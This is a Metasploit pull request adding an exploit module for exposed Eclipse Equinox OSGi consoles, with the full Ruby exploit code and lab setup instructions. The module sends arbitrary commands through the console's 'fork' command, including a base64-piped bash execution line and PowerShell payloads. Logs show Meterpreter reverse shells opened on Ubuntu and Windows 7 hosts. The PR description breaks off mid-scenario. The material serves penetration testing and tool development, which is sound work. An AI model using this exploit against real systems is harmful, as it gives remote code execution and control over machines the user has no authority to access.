### PR TITLE
Add module for Eclipse Equinoxe OSGi console RCE.

### DIFF
--- a/documentation/modules/exploit/multi/misc/osgi_console_exec.md
+++ b/documentation/modules/exploit/multi/misc/osgi_console_exec.md
@@ -6,6 +6,11 @@ This module takes advantage of OSGi consoles exposed by some Java-based middlewa
 
 The OSGi console is a telnet-based server that can be used for remote debugging and dynamic loading/removal of Java bundles running on an OSGi based server.
 
+#### References
+
+* OSGi Console - Gateway to (s)hell - https://qkaiser.github.io/pentesting/2018/02/13/osgi-console/
+* Eclipse Equinoxe OSGi console - https://www.eclipse.org/equinox/documents/quickstart-framework.php
+
 ### Test setup
 
 #### Linux environment
@@ -13,19 +18,19 @@ The OSGi console is a telnet-based server that can be used for remote debugging 
 Follow these steps to run the vulnerable application on a Linux host:
 
 1. Create a test environment directory
-``mkdir testenv && cd testenv``
+`mkdir testenv && cd testenv`
 2. Download the setup script
-``wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh``
+`wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh`
 3. Set appropriate permission
 `chmod +x setup.sh`
 4. Execute setup script
-``./setup.sh``
+`./setup.sh`
 5. Launch the vulnerable application with this command so it listens on port TCP/5555
-``java -jar org.eclipse.osgi.jar -console 5555``
+`java -jar org.eclipse.osgi.jar -console 5555`
 6. Verify that the server is running, you should be prompted with `osgi> `
-``telnet localhost 5555``
+`telnet localhost 5555`
 7. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
-``telnetd --ip=127.0.0.1 start``
+`telnetd --ip=127.0.0.1 start`
 
 #### Windows environment
 
@@ -35,11 +40,11 @@ Follow these steps to run the vulnerable application on a Windows host:
 2. Create a test directory. Let's name it `osgi_test` for clarity.
 3. Create a directory named `configuration` in `osgi_test`
 4. Create a file named `config.ini` in your `configuration` directory. The file should contain the following lines only:
-``
+```
 osgi.bundles=org.eclipse.equinox.console@start, org.apache.felix.gogo.command@start, org.apache.felix.gogo.shell@start, org.apache.felix.gogo.runtime@start
 eclipse.ignoreApp=true
 osgi.noShutdown=true
-``
+```
 5. Create an empty `plugins` directory in `osgi_test` directory
 6. Extract `plugins/org.apache.felix.gogo.command_(version).jar` from the SDK as `org.apache.felix.gogo.command.jar` in `osgi_test` directory. 
 7. Extract `plugins/org.apache.felix.gogo.runtime_(version).jar` from the SDK as `org.apache.felix.gogo.runtime.jar` in `osgi_test` directory.
@@ -47,7 +52,7 @@ osgi.noShutdown=true
 8. Extract `plugins/org.eclipse.equinox.console_(version).jar` from the SDK as `org.eclipse.equinox.console.jar` in `osgi_test` directory.
 9. Extract `plugins/org.eclipse.osgi_(version).jar` from the SDK as `org.eclipse.osgi.jar` in `osgi_test` directory.
 10. At the end of those steps, your `osgi_test` directory should contain the following items:
-``
+```
 .
 ├── configuration
 │   └── config.ini
@@ -57,13 +62,13 @@ osgi.noShutdown=true
 ├── org.eclipse.equinox.console.jar
 ├── org.eclipse.osgi.jar
 └── plugins
-``
+```
 11. Launch the vulnerable application with this command so it listens on port TCP/5555
-``java -jar org.eclipse.osgi.jar -console 5555``
+`java -jar org.eclipse.osgi.jar -console 5555`
 12. Verify that the server is running, you should be prompted with `osgi> `
-``telnet localhost 5555``
+`telnet localhost 5555`
 13. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
-``telnetd --ip=127.0.0.1 start``
+`telnetd --ip=127.0.0.1 start`
 
 If you don't want to go through all those steps manually I recommend you to run the setup script on a Linux host, mount the directory on a Windows VM and start from step 11.
 
@@ -73,12 +78,12 @@ You can verify the module against the vulnerable application with those steps:
 
   1. Install the application
   2. Start msfconsole
-  3. Do: ``use exploit/multi/misc/osgi_console_exec``
-  4. Do: ``set RHOST 127.0.0.1``
-  5. Do: ``set RPORT 5555`` or ``set RPORT 2019``
-  6. Do: ``check``. The target should appear vulnerable.
-  6. Do: ``set payload `` with the payload of your choosing.
-  5. Do: ``run``
+  3. Do: `use exploit/multi/misc/osgi_console_exec`
+  4. Do: `set RHOST 127.0.0.1`
+  5. Do: `set RPORT 5555` or `set RPORT 2019`
+  6. Do: `check`. The target should appear vulnerable.
+  6. Do: `set payload` with the payload of your choosing.
+  5. Do: `run`
   5. You should get a shell.
 
 ## Options
@@ -91,7 +96,7 @@ You can verify the module against the vulnerable application with those steps:
 
 Exploit running against a Ubuntu Linux target:
 
-``
+```
 msf5 > use exploit/multi/misc/osgi_console_exec
 msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4
 msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
@@ -118,13 +123,13 @@ Architecture : x64
 BuildTuple   : i486-linux-musl
 Meterpreter  : x86/linux
 
-``
+```
 
 ### Reverse shell on Windows host
 
 Exploit running against a Windows 7 target:
 
-``
+```
 msf5 > use exploit/multi/misc/osgi_console_exec
 msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3
 msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
@@ -151,9 +156,4 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
-``
-
-
-## References
-
-* OSGi Console - Gateway to (s)hell - https://qkaiser.github.io/pentesting/2018/02/13/osgi-console/
+```

--- a/documentation/modules/exploit/multi/misc/osgi_console_exec.md
+++ b/documentation/modules/exploit/multi/misc/osgi_console_exec.md
@@ -1,0 +1,159 @@
+## Vulnerable Application
+
+### Description
+
+This module takes advantage of OSGi consoles exposed by some Java-based middleware servers.
+
+The OSGi console is a telnet-based server that can be used for remote debugging and dynamic loading/removal of Java bundles running on an OSGi based server.
+
+### Test setup
+
+#### Linux environment
+
+Follow these steps to run the vulnerable application on a Linux host:
+
+1. Create a test environment directory
+``mkdir testenv && cd testenv``
+2. Download the setup script
+``wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh``
+3. Set appropriate permission
+`chmod +x setup.sh`
+4. Execute setup script
+``./setup.sh``
+5. Launch the vulnerable application with this command so it listens on port TCP/5555
+``java -jar org.eclipse.osgi.jar -console 5555``
+6. Verify that the server is running, you should be prompted with `osgi> `
+``telnet localhost 5555``
+7. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
+``telnetd --ip=127.0.0.1 start``
+
+#### Windows environment
+
+Follow these steps to run the vulnerable application on a Windows host:
+
+1. Download the Eclipse Equinoxe SDK from https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1
+2. Create a test directory. Let's name it `osgi_test` for clarity.
+3. Create a directory named `configuration` in `osgi_test`
+4. Create a file named `config.ini` in your `configuration` directory. The file should contain the following lines only:
+``
+osgi.bundles=org.eclipse.equinox.console@start, org.apache.felix.gogo.command@start, org.apache.felix.gogo.shell@start, org.apache.felix.gogo.runtime@start
+eclipse.ignoreApp=true
+osgi.noShutdown=true
+``
+5. Create an empty `plugins` directory in `osgi_test` directory
+6. Extract `plugins/org.apache.felix.gogo.command_(version).jar` from the SDK as `org.apache.felix.gogo.command.jar` in `osgi_test` directory. 
+7. Extract `plugins/org.apache.felix.gogo.runtime_(version).jar` from the SDK as `org.apache.felix.gogo.runtime.jar` in `osgi_test` directory.
+6. Extract `plugins/org.apache.felix.gogo.shell_(version).jar` from the SDK as `org.apache.felix.gogo.shell.jar` in `osgi_test` directory.
+8. Extract `plugins/org.eclipse.equinox.console_(version).jar` from the SDK as `org.eclipse.equinox.console.jar` in `osgi_test` directory.
+9. Extract `plugins/org.eclipse.osgi_(version).jar` from the SDK as `org.eclipse.osgi.jar` in `osgi_test` directory.
+10. At the end of those steps, your `osgi_test` directory should contain the following items:
+``
+.
+├── configuration
+│   └── config.ini
+├── org.apache.felix.gogo.command.jar
+├── org.apache.felix.gogo.runtime.jar
+├── org.apache.felix.gogo.shell.jar
+├── org.eclipse.equinox.console.jar
+├── org.eclipse.osgi.jar
+└── plugins
+``
+11. Launch the vulnerable application with this command so it listens on port TCP/5555
+``java -jar org.eclipse.osgi.jar -console 5555``
+12. Verify that the server is running, you should be prompted with `osgi> `
+``telnet localhost 5555``
+13. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
+``telnetd --ip=127.0.0.1 start``
+
+If you don't want to go through all those steps manually I recommend you to run the setup script on a Linux host, mount the directory on a Windows VM and start from step 11.
+
+## Verification Steps
+
+You can verify the module against the vulnerable application with those steps:
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ``use exploit/multi/misc/osgi_console_exec``
+  4. Do: ``set RHOST 127.0.0.1``
+  5. Do: ``set RPORT 5555`` or ``set RPORT 2019``
+  6. Do: ``check``. The target should appear vulnerable.
+  6. Do: ``set payload `` with the payload of your choosing.
+  5. Do: ``run``
+  5. You should get a shell.
+
+## Options
+
+  **TIME_WAIT** - Time to wait for payload to be executed. The default value is set to 20 seconds.
+
+## Scenarios
+
+### Reverse shell on Linux host
+
+Exploit running against a Ubuntu Linux target:
+
+``
+msf5 > use exploit/multi/misc/osgi_console_exec
+msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4
+msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
+msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0
+msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp
+msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
+msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
+msf5 exploit(multi/misc/osgi_console_exec) > run
+[*] Exploit running as background job 1.
+[*] Started reverse TCP handler on 172.20.10.2:4444
+[*] 172.20.10.4:5555 - Accessing the OSGi console ...
+[*] 172.20.10.4:5555 - Exploiting...
+[*] Sending stage (857352 bytes) to 172.20.10.4
+[*] 172.20.10.4:5555 - 172.20.10.4:5555 - Waiting for session...
+[*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100
+[*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes)
+
+msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2
+[*] Starting interaction with 2...
+meterpreter > sysinfo
+Computer     : 172.20.10.4
+OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+
+``
+
+### Reverse shell on Windows host
+
+Exploit running against a Windows 7 target:
+
+``
+msf5 > use exploit/multi/misc/osgi_console_exec
+msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3
+msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
+msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1
+msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp
+msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
+msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
+msf5 exploit(multi/misc/osgi_console_exec) > run
+[*] Exploit running as background job 2.
+[*] Started reverse TCP handler on 172.20.10.2:4444
+[*] 172.20.10.3:5555 - Accessing the OSGi console ...
+[*] 172.20.10.3:5555 - Exploiting...
+[*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session...
+[*] Sending stage (179779 bytes) to 172.20.10.3
+[*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100
+msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : PENTEST-PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+``
+
+
+## References
+
+* OSGi Console - Gateway to (s)hell - https://qkaiser.github.io/pentesting/2018/02/13/osgi-console/

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -27,14 +27,14 @@ class MetasploitModule < Msf::Exploit::Remote
        [
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
        ],
-      'Platform' => %w{ linux osx win },
+      'Platform' => %w{ linux win },
       'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
       'Targets'=> [
         [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
         [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
        ],
       'CmdStagerFlavor' => [ 'bourne' ],
-      'DisclosureDate'  => 'Jan 31 2018',
+      'DisclosureDate'  => 'Feb 13 2018',
       'DefaultTarget'   => 0))
     deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
     register_options([

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
 
+  TELNET_IAC = Msf::Exploit::Remote::Telnet
+
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Eclipse Equinoxe OSGi Console Command Execution',
@@ -45,18 +47,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
     res = sock.get_once
-    # if we detect signature IAC, we negotiate
-    # OSGi console  in default mode expect the client to send its terminal type
-    #   * \xFF\xFB\x01 - Will Echo
-    #   * \xFF\xFB\x03 - Will Suppress Go Ahead
-    #   * \xFF\xFD\x1F - Do Negotiate About Window Size
-    #   * \xFF\xFD\x18 - Do Terminal Type
-    if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
-      # we reply with our terminal type
-      # suboption Terminal Type \xFF\xFA\x18
-      # terminal type 'xterm-256color' (\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72)
-      # suboption end \xFF\xF0
-      sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
+        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
+      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
+      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
+               "\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72"+\
+               TELNET_IAC::IAC+TELNET_IAC::SE)
       res = sock.get_once
     end
     disconnect
@@ -97,9 +95,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def exec_command(cmd)
       connect
       res = sock.get_once
-      # if we detect signature IAC, we negotiate
-      if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
-        sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+      if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
+        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
+        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
+        sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
+          "\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72"+\
+          TELNET_IAC::IAC+TELNET_IAC::SE)
         res = sock.get_once
       end
       print_status("Exploiting...")

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -53,8 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
       # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
       sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
-               "\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72"+\
-               TELNET_IAC::IAC+TELNET_IAC::SE)
+        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
       res = sock.get_once
     end
     disconnect
@@ -100,8 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
         TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
         TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
         sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
-          "\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72"+\
-          TELNET_IAC::IAC+TELNET_IAC::SE)
+          "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
         res = sock.get_once
       end
       print_status("Exploiting...")

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Eclipse Equinoxe OSGi Console Command Execution',
+      'Description'    => %q{
+        Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
+        'fork' command to execute arbitrary commands on the remote system..
+      },
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin@gmail.com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+       [
+         ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
+       ],
+      'Platform' => %w{ linux osx win },
+      'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
+      'Targets'=> [
+        [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
+        [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
+       ],
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'DisclosureDate'  => 'Jan 31 2018',
+      'DefaultTarget'   => 0))
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
+    register_options([
+      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
+    ])
+  end
+
+  def check
+    connect
+    res = sock.get_once
+    # if we detect signature IAC, we negotiate
+    if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
+        sock.put("\xFF\xFD\x01\xFF\xFD\x03\xFF\xFB\x1F\xFF\xFA\x1F\x00\x3B\x00\x1D\xFF\xF0\xFF\xFB\x18")
+        res = sock.get_once
+        sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+        res = sock.get_once
+    end
+    disconnect
+    if res && res == "osgi> "
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    begin
+      print_status("Accessing the OSGi console ...")
+
+      unless check == Exploit::CheckCode::Vulnerable
+        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
+      end
+
+      if target['Platform'] == "win" then
+        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
+      else
+        execute_cmdstager({:flavor => :bourne})
+      end
+
+      print_status("#{rhost}:#{rport} - Waiting for session...")
+
+      (datastore['TIME_WAIT']).times do
+        Rex.sleep(1)
+        # Success! session is here!
+        break if session_created?
+      end
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
+    ensure
+      disconnect
+    end
+  end
+
+  def exec_command(cmd)
+      connect
+      res = sock.get_once
+      # if we detect signature IAC, we negotiate
+      if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
+          sock.put("\xFF\xFD\x01\xFF\xFD\x03\xFF\xFB\x1F\xFF\xFA\x1F\x00\x3B\x00\x1D\xFF\xF0\xFF\xFB\x18")
+          res = sock.get_once
+          sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+          res = sock.get_once
+      end
+      print_status("Exploiting...")
+      sock.put("#{cmd}\r\n")
+      res = sock.get
+      sock.put("disconnect\r\n")
+      res = sock.get
+      sock.put("y\r\n")
+  end
+
+  def execute_command(cmd, opts={})
+    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
+    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
+    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
+  end
+end

--- a/modules/exploits/multi/misc/osgi_console_exec.rb
+++ b/modules/exploits/multi/misc/osgi_console_exec.rb
@@ -46,11 +46,18 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     res = sock.get_once
     # if we detect signature IAC, we negotiate
+    # OSGi console  in default mode expect the client to send its terminal type
+    #   * \xFF\xFB\x01 - Will Echo
+    #   * \xFF\xFB\x03 - Will Suppress Go Ahead
+    #   * \xFF\xFD\x1F - Do Negotiate About Window Size
+    #   * \xFF\xFD\x18 - Do Terminal Type
     if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
-        sock.put("\xFF\xFD\x01\xFF\xFD\x03\xFF\xFB\x1F\xFF\xFA\x1F\x00\x3B\x00\x1D\xFF\xF0\xFF\xFB\x18")
-        res = sock.get_once
-        sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
-        res = sock.get_once
+      # we reply with our terminal type
+      # suboption Terminal Type \xFF\xFA\x18
+      # terminal type 'xterm-256color' (\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72)
+      # suboption end \xFF\xF0
+      sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+      res = sock.get_once
     end
     disconnect
     if res && res == "osgi> "
@@ -92,10 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
       res = sock.get_once
       # if we detect signature IAC, we negotiate
       if res == "\xFF\xFB\x01\xFF\xFB\x03\xFF\xFD\x1F\xFF\xFD\x18"
-          sock.put("\xFF\xFD\x01\xFF\xFD\x03\xFF\xFB\x1F\xFF\xFA\x1F\x00\x3B\x00\x1D\xFF\xF0\xFF\xFB\x18")
-          res = sock.get_once
-          sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
-          res = sock.get_once
+        sock.put("\xFF\xFA\x18\x00\x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72\xFF\xF0")
+        res = sock.get_once
       end
       print_status("Exploiting...")
       sock.put("#{cmd}\r\n")


### PR DESCRIPTION
## Vulnerable Application

### Description

This module takes advantage of OSGi consoles exposed by some Java-based middleware servers. 

The OSGi console is a telnet-based server that can be used for remote debugging and dynamic loading/removal of Java bundles running on an OSGi based server.

#### References

* OSGi Console - Gateway to (s)hell - https://qkaiser.github.io/pentesting/2018/02/13/osgi-console/

### Test setup

#### Linux environment

Follow these steps to run the vulnerable application on a Linux host:

1. Create a test environment directory
```mkdir testenv && cd testenv```
2. Download the setup script
```wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh```
3. Set appropriate permission
`chmod +x setup.sh`
4. Execute setup script
```./setup.sh```
5. Launch the vulnerable application with this command so it listens on port TCP/5555
```java -jar org.eclipse.osgi.jar -console 5555```
6. Verify that the server is running, you should be prompted with `osgi> `
```telnet localhost 5555```
7. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
```telnetd --ip=127.0.0.1 start```

#### Windows environment

Follow these steps to run the vulnerable application on a Windows host:

1. Download the Eclipse Equinoxe SDK from https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1
2. Create a test directory. Let's name it `osgi_test` for clarity.
3. Create a directory named `configuration` in `osgi_test`
4. Create a file named `config.ini` in your `configuration` directory. The file should contain the following lines only:
```
osgi.bundles=org.eclipse.equinox.console@start, org.apache.felix.gogo.command@start, org.apache.felix.gogo.shell@start, org.apache.felix.gogo.runtime@start
eclipse.ignoreApp=true
osgi.noShutdown=true
```
5. Create an empty `plugins` directory in `osgi_test` directory
6. Extract `plugins/org.apache.felix.gogo.command_(version).jar` from the SDK as `org.apache.felix.gogo.command.jar` in `osgi_test` directory. 
7. Extract `plugins/org.apache.felix.gogo.runtime_(version).jar` from the SDK as `org.apache.felix.gogo.runtime.jar` in `osgi_test` directory.
6. Extract `plugins/org.apache.felix.gogo.shell_(version).jar` from the SDK as `org.apache.felix.gogo.shell.jar` in `osgi_test` directory.
8. Extract `plugins/org.eclipse.equinox.console_(version).jar` from the SDK as `org.eclipse.equinox.console.jar` in `osgi_test` directory.
9. Extract `plugins/org.eclipse.osgi_(version).jar` from the SDK as `org.eclipse.osgi.jar` in `osgi_test` directory.
10. At the end of those steps, your `osgi_test` directory should contain the following items:
```
.
├── configuration
│   └── config.ini
├── org.apache.felix.gogo.command.jar
├── org.apache.felix.gogo.runtime.jar
├── org.apache.felix.gogo.shell.jar
├── org.eclipse.equinox.console.jar
├── org.eclipse.osgi.jar
└── plugins
```
11. Launch the vulnerable application with this command so it listens on port TCP/5555
```java -jar org.eclipse.osgi.jar -console 5555```
12. Verify that the server is running, you should be prompted with `osgi> `
```telnet localhost 5555```
13. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
```telnetd --ip=127.0.0.1 start```

If you don't want to go through all those steps manually I recommend you to run the setup script on a Linux host, mount the directory on a Windows VM and start from step 11.

## Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/misc/osgi_console_exec```
  4. Do: ```set RHOST 127.0.0.1```
  5. Do: ```set RPORT 5555``` or ```set RPORT 2019```
  6. Do: ```check```. The target should appear vulnerable.
  6. Do: ```set payload ``` with the payload of your choosing.
  5. Do: ```run```
  5. You should get a shell.

## Options

  **TIME_WAIT** - Time to wait for payload to be executed. The default value is set to 20 seconds.

## Scenarios

### Reverse shell on Linux host

Exploit running against a Ubuntu Linux target:

```
msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0
msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.4:5555 - Accessing the OSGi console ...
[*] 172.20.10.4:5555 - Exploiting...
[*] Sending stage (857352 bytes) to 172.20.10.4
[*] 172.20.10.4:5555 - 172.20.10.4:5555 - Waiting for session...
[*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100
[*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes)

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer     : 172.20.10.4
OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

```

### Reverse shell on Windows host

Exploit running against a Windows 7 target:

```
msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
